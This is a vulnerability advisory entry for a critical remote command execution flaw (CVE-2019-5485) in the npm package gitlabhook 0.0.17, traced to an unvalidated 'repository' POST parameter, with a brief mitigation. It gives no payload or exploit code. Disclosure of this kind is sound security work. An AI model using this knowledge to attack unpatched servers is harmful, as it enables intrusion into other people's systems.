Vendor: gitlabhook
Author: Semen Alexandrovich Lyhin
Year: 2019
CVSS: 10.0 (CRITICAL)
Vulnerability Type: Remote Command Execution
CWE: 78
Product Name: gitlabhook
Affected Version From: 0.0.17
Affected Version To: 0.0.17
Patch Exists: YES
Related CVE: CVE-2019-5485
CPE: a:npmjs:gitlabhook:0.0.17
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux 2, Windows 10
NPMJS gitlabhook 0.0.17 – ‘repository’ Remote Command Execution
A vulnerability in NPMJS gitlabhook version 0.0.17 allows an attacker to execute arbitrary commands on the target system. The cause is a lack of input validation on the 'repository' parameter of the POST request: an attacker can send a crafted POST request whose 'repository' parameter contains a malicious value, and the supplied content is executed as a command on the target system.
Mitigation:
Input validation should be implemented on the 'repository' parameter of the POST request so that its value can no longer be interpreted as a command.